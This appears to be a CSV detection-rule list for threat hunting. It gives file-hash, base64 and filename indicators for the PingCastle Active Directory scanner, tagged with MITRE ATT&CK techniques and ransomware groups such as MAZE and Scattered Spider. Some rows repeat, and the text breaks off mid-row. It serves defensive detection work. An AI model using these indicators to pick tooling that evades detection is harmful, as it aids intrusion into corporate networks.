"*743e73b664ae59c68042364849629ca96fe81d3cba0e48e4e7f4f30e71d04f32*",".{0,1000}743e73b664ae59c68042364849629ca96fe81d3cba0e48e4e7f4f30e71d04f32.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*74a4277e37419fd55a972cbaf18d6cb1334c544346c698f3eb59c23cd2e3e82a*",".{0,1000}74a4277e37419fd55a972cbaf18d6cb1334c544346c698f3eb59c23cd2e3e82a.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability 
scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*7585ced4ace610e2b5ca199838a277d6eed393bf4ad7bbf687ded696e67399f8*",".{0,1000}7585ced4ace610e2b5ca199838a277d6eed393bf4ad7bbf687ded696e67399f8.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*7585ced4ace610e2b5ca199838a277d6eed393bf4ad7bbf687ded696e67399f8*",".{0,1000}7585ced4ace610e2b5ca199838a277d6eed393bf4ad7bbf687ded696e67399f8.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*7749b3c203617b95dce12ca8a044e5206e585a2f010c011ee87d7251fb1d0a4b*",".{0,1000}7749b3c203617b95dce12ca8a044e5206e585a2f010c011ee87d7251fb1d0a4b.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*7a7a44335289a4612f0dd903745b49853c0f8f53dcca01306d5d45ca1611a2df*",".{0,1000}7a7a44335289a4612f0dd903745b49853c0f8f53dcca01306d5d45ca1611a2df.{0,1000}","greyware_tool_keyword","pingcastle","active directory 
weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*7cb8360009c9ee1fab996e446a5d1f2d1540dadb9256c9787f3f30e33aa5e121*",".{0,1000}7cb8360009c9ee1fab996e446a5d1f2d1540dadb9256c9787f3f30e33aa5e121.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*7e09a8fc84665d590659493aa9a832945c6ff9b25bfa87f3bd2aa9636781e87a*",".{0,1000}7e09a8fc84665d590659493aa9a832945c6ff9b25bfa87f3bd2aa9636781e87a.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*7e09a8fc84665d590659493aa9a832945c6ff9b25bfa87f3bd2aa9636781e87a*",".{0,1000}7e09a8fc84665d590659493aa9a832945c6ff9b25bfa87f3bd2aa9636781e87a.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" 
"*7e87ed799b7b8ca543691b5f261212cb3efebca5ed03e65ceea4e7dbb405ed34*",".{0,1000}7e87ed799b7b8ca543691b5f261212cb3efebca5ed03e65ceea4e7dbb405ed34.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*806530346d15b80d28b3050b3a6d435025ffef592fa44b9abae471be6f9c0cb8*",".{0,1000}806530346d15b80d28b3050b3a6d435025ffef592fa44b9abae471be6f9c0cb8.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*811db2a2f5deab16fc831dc8ff74172c121e9676a325bd8761fde7a863bcc598*",".{0,1000}811db2a2f5deab16fc831dc8ff74172c121e9676a325bd8761fde7a863bcc598.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*83cafd75fbd94992f38162260fb8cd5f6388c10f4e0b40890554568c43a9fc19*",".{0,1000}83cafd75fbd94992f38162260fb8cd5f6388c10f4e0b40890554568c43a9fc19.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability 
scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*88e0abfe14884bc8850346e1250c8fd54ee3f2de770f32d3ffecbe06c7769141*",".{0,1000}88e0abfe14884bc8850346e1250c8fd54ee3f2de770f32d3ffecbe06c7769141.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*89e35428319e2e7ec6520f8f828c77e7a94dddf7137b17e0585cd98f5b42be4c*",".{0,1000}89e35428319e2e7ec6520f8f828c77e7a94dddf7137b17e0585cd98f5b42be4c.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*8b6078e8fea18dfd13473f20cd0d7e74f2724d66183d5f44437139d996ec4794*",".{0,1000}8b6078e8fea18dfd13473f20cd0d7e74f2724d66183d5f44437139d996ec4794.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*906b60debb9c88e649118409185663b29d3f29f668ca58de314890743a2c7277*",".{0,1000}906b60debb9c88e649118409185663b29d3f29f668ca58de314890743a2c7277.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - 
Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*90e1610b1a020875e5d02774f28770a32787cd4379ce184890979e8f241b904d*",".{0,1000}90e1610b1a020875e5d02774f28770a32787cd4379ce184890979e8f241b904d.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*90e1610b1a020875e5d02774f28770a32787cd4379ce184890979e8f241b904d*",".{0,1000}90e1610b1a020875e5d02774f28770a32787cd4379ce184890979e8f241b904d.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*90e1610b1a020875e5d02774f28770a32787cd4379ce184890979e8f241b904d*",".{0,1000}90e1610b1a020875e5d02774f28770a32787cd4379ce184890979e8f241b904d.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*95699dfcbe694396000eeeeb2df293590741f0b912ce5f31c5844b0011407d44*",".{0,1000}95699dfcbe694396000eeeeb2df293590741f0b912ce5f31c5844b0011407d44.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - 
TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*9bc4890f95874f3f6931e15694b0e7f37f2a7a18daf460ea109fb5f0c8886800*",".{0,1000}9bc4890f95874f3f6931e15694b0e7f37f2a7a18daf460ea109fb5f0c8886800.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*9c5f80d8b37be0d48a0c13a3838db1455aed0c3e23500ac7d9293bb779544e59*",".{0,1000}9c5f80d8b37be0d48a0c13a3838db1455aed0c3e23500ac7d9293bb779544e59.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*a18c0916da1f5900730a30f152c36bd706cbd1e2f9f8bb042207de5ac3ef8097*",".{0,1000}a18c0916da1f5900730a30f152c36bd706cbd1e2f9f8bb042207de5ac3ef8097.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*a5209d425fa5e65dc69e5187454446b5a035b3762a325b6ba0606fc168041c76*",".{0,1000}a5209d425fa5e65dc69e5187454446b5a035b3762a325b6ba0606fc168041c76.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - 
T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*a8d276db0a9f5d22cd2757538f19b4fc1e234db045d7355aa656326ae8acece3*",".{0,1000}a8d276db0a9f5d22cd2757538f19b4fc1e234db045d7355aa656326ae8acece3.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*AAASCCVcEQQCADCgAAARAA4AGwABABkAAAABAAFbFgMIAEtcRlwEAAQAEgDm*",".{0,1000}AAASCCVcEQQCADCgAAARAA4AGwABABkAAAABAAFbFgMIAEtcRlwEAAQAEgDm.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#base64","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*AAASCCVcEQQCADCgAAARAA4AGwABABkAAAABAAFbGgMQAAAABgAIQDZbEgDm*",".{0,1000}AAASCCVcEQQCADCgAAARAA4AGwABABkAAAABAAFbGgMQAAAABgAIQDZbEgDm.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#base64","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*ACLScanner.exe*",".{0,1000}ACLScanner\.exe.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - 
TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ae4825d459669ab8cba5f72cd12b587f7a61d5da96e6e54db1bd8c238bcd83ae*",".{0,1000}ae4825d459669ab8cba5f72cd12b587f7a61d5da96e6e54db1bd8c238bcd83ae.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*ae4825d459669ab8cba5f72cd12b587f7a61d5da96e6e54db1bd8c238bcd83ae*",".{0,1000}ae4825d459669ab8cba5f72cd12b587f7a61d5da96e6e54db1bd8c238bcd83ae.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*aee777ead4791c2d6a5420b0625e7fdea13f6d84dedcaff924a5845df5f4db94*",".{0,1000}aee777ead4791c2d6a5420b0625e7fdea13f6d84dedcaff924a5845df5f4db94.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" 
"*b62fddbe045b405c39c6d9252805804619c0551d527b78806f0f71246b87b812*",".{0,1000}b62fddbe045b405c39c6d9252805804619c0551d527b78806f0f71246b87b812.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*bcbede4c733ae4b0abe3657ec35f1917dcbdb680aea8e05431d6fef074b720c2*",".{0,1000}bcbede4c733ae4b0abe3657ec35f1917dcbdb680aea8e05431d6fef074b720c2.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*bcbede4c733ae4b0abe3657ec35f1917dcbdb680aea8e05431d6fef074b720c2*",".{0,1000}bcbede4c733ae4b0abe3657ec35f1917dcbdb680aea8e05431d6fef074b720c2.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*bluekeepscanner.exe*",".{0,1000}bluekeepscanner\.exe.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability 
scanner","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A","10","","N/A","","","" "*c5719fe52a801b38f7e30386450f5985a7f378147e00d1392b12b902730f6601*",".{0,1000}c5719fe52a801b38f7e30386450f5985a7f378147e00d1392b12b902730f6601.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*c59f22eb5c115a9c633a0b1ff514787c1ceeca2bf4a660f0232616b3fc8336a7*",".{0,1000}c59f22eb5c115a9c633a0b1ff514787c1ceeca2bf4a660f0232616b3fc8336a7.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*cb5618be68d7de48075061262b531c7dd528274a7537195f33dabdffd48a058d*",".{0,1000}cb5618be68d7de48075061262b531c7dd528274a7537195f33dabdffd48a058d.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" 
"*cc45f912feb2ff63f5868a2474716c30c75b0a7bc5be629a26d3b03acbf289f6*",".{0,1000}cc45f912feb2ff63f5868a2474716c30c75b0a7bc5be629a26d3b03acbf289f6.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*cc45f912feb2ff63f5868a2474716c30c75b0a7bc5be629a26d3b03acbf289f6*",".{0,1000}cc45f912feb2ff63f5868a2474716c30c75b0a7bc5be629a26d3b03acbf289f6.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*cce6497c3f06700ee80fbd145bc228aa2016f1d3973e1a22b5d6c1bfbe53a447*",".{0,1000}cce6497c3f06700ee80fbd145bc228aa2016f1d3973e1a22b5d6c1bfbe53a447.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*d21a159ec788b457b98da90633ff963124fe551ff66b86e48635d35175902fa0*",".{0,1000}d21a159ec788b457b98da90633ff963124fe551ff66b86e48635d35175902fa0.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability 
scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*d21a159ec788b457b98da90633ff963124fe551ff66b86e48635d35175902fa0*",".{0,1000}d21a159ec788b457b98da90633ff963124fe551ff66b86e48635d35175902fa0.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*d3b9e8104fcf67fd9ac71d9cf0bc29d3c870ea60c79ce8b9e9d9bfc1d64c3809*",".{0,1000}d3b9e8104fcf67fd9ac71d9cf0bc29d3c870ea60c79ce8b9e9d9bfc1d64c3809.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*db71a0c966e917def48ab32e67962d37dbfb4ad527f3e3c9615d6a45a69ba69b*",".{0,1000}db71a0c966e917def48ab32e67962d37dbfb4ad527f3e3c9615d6a45a69ba69b.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*dd550c264f7af33bca01b0e32d4504e8e69b0b7ab99b472d8b59b818c83b7b96*",".{0,1000}dd550c264f7af33bca01b0e32d4504e8e69b0b7ab99b472d8b59b818c83b7b96.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - 
Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*dd625dc8684d4a9a60e5aea80ec9379841cc80f2c60e40d9737c89de5b32fb04*",".{0,1000}dd625dc8684d4a9a60e5aea80ec9379841cc80f2c60e40d9737c89de5b32fb04.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*e079f9dbcc51b905759c6a17d46979181b432b6e195aafaf3a3453b7d1d687dc*",".{0,1000}e079f9dbcc51b905759c6a17d46979181b432b6e195aafaf3a3453b7d1d687dc.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*e854c1bb27c02fbf6f86bbd1ca750d9cf70cd3a978d142e6d97119bc81cb1ee7*",".{0,1000}e854c1bb27c02fbf6f86bbd1ca750d9cf70cd3a978d142e6d97119bc81cb1ee7.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*e8e73f8cb4babe6bf59cdfa6090a183d1f8be8da8e13b19d5b8d66126800b41f*",".{0,1000}e8e73f8cb4babe6bf59cdfa6090a183d1f8be8da8e13b19d5b8d66126800b41f.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - 
TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*e96e655341857f858ba7deb75afcc9eea4b8cd24af772720653ec7ce0617eeef*",".{0,1000}e96e655341857f858ba7deb75afcc9eea4b8cd24af772720653ec7ce0617eeef.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*ef13e3756e1108a1dc018ff356f1b50c418f2ddd25b701aeaf52f959c883c53d*",".{0,1000}ef13e3756e1108a1dc018ff356f1b50c418f2ddd25b701aeaf52f959c883c53d.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*ef13e3756e1108a1dc018ff356f1b50c418f2ddd25b701aeaf52f959c883c53d*",".{0,1000}ef13e3756e1108a1dc018ff356f1b50c418f2ddd25b701aeaf52f959c883c53d.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*efa152281662334f2a353cd4819a9eba3b9fae144e50758487df31ab1974876f*",".{0,1000}efa152281662334f2a353cd4819a9eba3b9fae144e50758487df31ab1974876f.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness 